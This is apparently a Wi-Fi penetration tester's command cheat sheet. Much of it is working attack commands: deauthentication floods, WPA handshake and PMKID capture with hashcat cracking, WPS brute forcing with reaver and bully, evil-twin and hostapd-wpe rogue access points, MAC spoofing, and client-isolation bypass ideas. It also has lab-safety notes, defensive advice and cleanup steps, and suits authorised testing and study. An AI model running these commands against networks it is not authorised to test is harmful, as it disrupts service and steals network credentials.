wifi::pentest

ip link
iw dev
iw phy
iwconfig
nmcli device status
rfkill list
ethtool wlan0               # sometimes useful for driver info

# Look for:
Supported interface modes: managed / monitor / AP
Supported Ciphers: CCMP / GCMP / TKIP
Supported commands: remain-on-channel, set-monitor, AP

uname -a
lsusb
lspci -nn | grep -i wireless
dmesg | grep -iE 'wlan|wifi|firmware|rtl|ath|mt76|iwlwifi'
journalctl -b | grep -iE 'wlan|wifi|NetworkManager|wpa_supplicant'

# Current config backup before testing
mkdir -p wifi-backup
cp -a /etc/NetworkManager wifi-backup/
cp -a /etc/wpa_supplicant wifi-backup/ 2>/dev/null
nmcli connection show > wifi-backup/nmcli-connections.txt

tcpdump -D
airmon-ng
airmon-ng check
airmon-ng check kill          # only if you accept network disruption

# Minimal capture test
timeout 10 tcpdump -i wlan0mon -I -nn -c 20
timeout 10 tshark -i wlan0mon -I -a duration:10

# If nothing appears:
wrong channel / no monitor mode / driver limitation / rfkill / DFS

# aircrack-ng route
airmon-ng start wlan0
airmon-ng start wlan0 6     # lock channel 6

# iw route
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
iw dev wlan0 set channel 6

# Set channel width when needed
iw dev wlan0 set channel 36 HT20

airodump-ng wlan0mon
wash -i wlan0mon                 # WPS
kismet -c wlan0
bettercap -iface wlan0mon
iw dev wlan0 scan | less

# Lock a BSSID/channel
airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Check allowed channels / regdom
iw reg get
sudo iw reg set BE

# DFS can delay or block capture/AP tests
Use non-DFS channels when possible for lab work.

# Hidden SSID
Passive capture + wait for probe/assoc, or induce reconnect:
aireplay-ng --deauth 5 -a BSSID wlan0mon

airodump-ng --bssid BSSID -c CH -w handshake wlan0mon
aireplay-ng --deauth 10 -a BSSID -c CLIENT wlan0mon
aircrack-ng handshake.cap -w wordlist.txt

# Verify capture
aircrack-ng handshake.cap
hcxpcapngtool -o hash.hc22000 handshake.pcapng

hcxdumptool -i wlan0mon -o dump.pcapng \
  --enable_status=1
hcxpcapngtool -o hash.hc22000 dump.pcapng
hashcat -m 22000 hash.hc22000 wordlist.txt

# Notes
Works only on targets exposing PMKID data.
WPA3-SAE changes the game; expect fewer offline wins.

airbase-ng -e "FreeWifi" -c 6 wlan0mon
hostapd-wpe hostapd-wpe.conf
bettercap -iface wlan0mon
wifi.recon on
wifi.deauth all

# Safer lab setup
Use an isolated lab, dedicated RF shielded space, or attenuators.
Avoid deauth on networks you do not own / control.

# Management
Beacon / Probe Req / Probe Resp / Auth / Assoc / Deauth / Disassoc

# Control
RTS / CTS / ACK / Block Ack

# Data
QoS Data / Null / EAPOL

# Useful filters
wlan.fc.type == 0        # management
wlan.fc.type == 1        # control
wlan.fc.type == 2        # data
eapol                     # handshake packets
wlan.addr == aa:bb:cc:dd:ee:ff

# Radiotap = capture metadata from your adapter/driver
Common fields:
radiotap.channel.freq
radiotap.dbm_antsignal
radiotap.dbm_antnoise
radiotap.rate
radiotap.flags.shortgi
radiotap.mcs.index
radiotap.he.data_*

tshark -r wifi.pcapng -Y eapol
tshark -r wifi.pcapng -Y wlan.fc.type_subtype == 0x08   # beacons
tshark -r wifi.pcapng -T fields -e wlan.sa -e wlan.da -e wlan.bssid
tshark -r wifi.pcapng -T fields -e radiotap.dbm_antsignal
tshark -r wifi.pcapng -q -z io,phs

# Deauth / disassoc hunting
tshark -r wifi.pcapng -Y wlan.fc.type_subtype == 0x0c || wlan.fc.type_subtype == 0x0a

# Classic
aircrack-ng / airmon-ng / airodump-ng / aireplay-ng / airbase-ng

# Modern capture + cracking
hcxdumptool / hcxpcapngtool / hashcat

# Discovery / monitoring
kismet / bettercap / wash / reaver / bully

# Packet analysis
wireshark / tshark / tcpdump / scapy

wash -i wlan0mon
reaver -i wlan0mon -b BSSID -vv
bully wlan0mon -b BSSID

# Notes
WPS is often disabled now, but still appears in old hardware / labs.
Treat it as target-dependent, not universal.

ip link set wlan0 down
macchanger -r wlan0
ip link set wlan0 up

# Restore hardware MAC
macchanger -p wlan0

# Beware
NetworkManager may also randomize MACs.
Persistent config matters when testing and when restoring.

AirSnitch focuses on bypassing Wi-Fi client isolation.
It is not "guess the password" and not classical crypto breaking.

Think in layers:
1. shared broadcast/group key abuse
2. IP-layer gateway bouncing
3. MAC spoofing / rebinding / port stealing style effects
4. cross-layer mismatch between isolation assumptions

# Test assumptions, not just Wi-Fi auth
Can client A reach / influence client B despite "isolation"?
Can the gateway path be abused?
Do duplicate MAC conditions confuse the AP / bridge?
Can broadcast/ARP behavior reveal peer traffic paths?

# Lab clues to watch
Unexpected ARP replies
Frames to gateway MAC landing on attacker path
Duplicate / oscillating MAC-learning behavior
Peer-to-peer reachability despite isolation toggles

Client isolation alone is not enough.
Segment guest / untrusted users into separate VLANs when possible.
Use PMF where supported.
Monitor duplicate MAC / spoofing behavior.
Prefer end-to-end protection (HTTPS, VPN, app-layer auth).

# For reports
Document AP model / firmware / client OS / regdom / channel / cipher.
Reproducibility matters.

# Model A: wireless-only
Monitor-mode pcapng from the air
Good for beacons, probes, EAPOL, deauth, radiotap, signal clues

# Model B: wireless + upstream ethernet
One capture on monitor interface + one on AP uplink / gateway
Good for correlating association events with IP/TCP activity

Match by time first.
Then match by client MAC / IP / hostname / DHCP / DNS / TLS SNI.

# Useful pivots
assoc request → DHCP → DNS → HTTP/TLS
EAPOL → new IP flow burst
Deauth → reconnect → captive portal / auth flow

# Files
Prefer pcapng + synchronized clock on all capture systems.

# Wireless side
tshark -r wifi.pcapng -Y eapol || wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02

# Upstream side
tshark -r uplink.pcapng -Y dhcp || dns || http || tls

# Merge if timestamps are aligned
mergecap -w merged.pcapng wifi.pcapng uplink.pcapng

sudo apt install \
  aircrack-ng hcxdumptool hashcat wireshark tshark tcpdump \
  iw wireless-tools rfkill macchanger kismet bettercap \
  hostapd dnsmasq iptables nftables

# /etc/hostapd/hostapd.conf
interface=wlan1
ssid=lab-ap
hw_mode=g
channel=6
wpa=2
wpa_passphrase=labpassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP

# /etc/dnsmasq.d/lab-ap.conf
interface=wlan1
dhcp-range=10.10.50.10,10.10.50.100,12h

# Address + services
ip addr add 10.10.50.1/24 dev wlan1
systemctl restart hostapd dnsmasq

# Example uplink: eth0, AP iface: wlan1
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o wlan1 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT

# nftables equivalent preferred on modern Debian if already in use

sudo systemctl stop hostapd dnsmasq 2>/dev/null
sudo airmon-ng stop wlan0mon 2>/dev/null

# If you used iw manually
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up

# Restore MAC if changed
sudo macchanger -p wlan0

sudo sysctl -w net.ipv4.ip_forward=0
sudo iptables -t nat -F
sudo iptables -F FORWARD

# Or restore saved rules if you used them
sudo iptables-restore < saved.rules
sudo nft flush ruleset            # only if your system is not relying on nft rules

sudo systemctl restart NetworkManager
sudo systemctl restart wpa_supplicant 2>/dev/null
nmcli radio wifi on
rfkill unblock wifi
nmcli device wifi rescan
nmcli connection up "Your Saved SSID"

# If DNS broke
resolvectl status
sudo systemctl restart systemd-resolved 2>/dev/null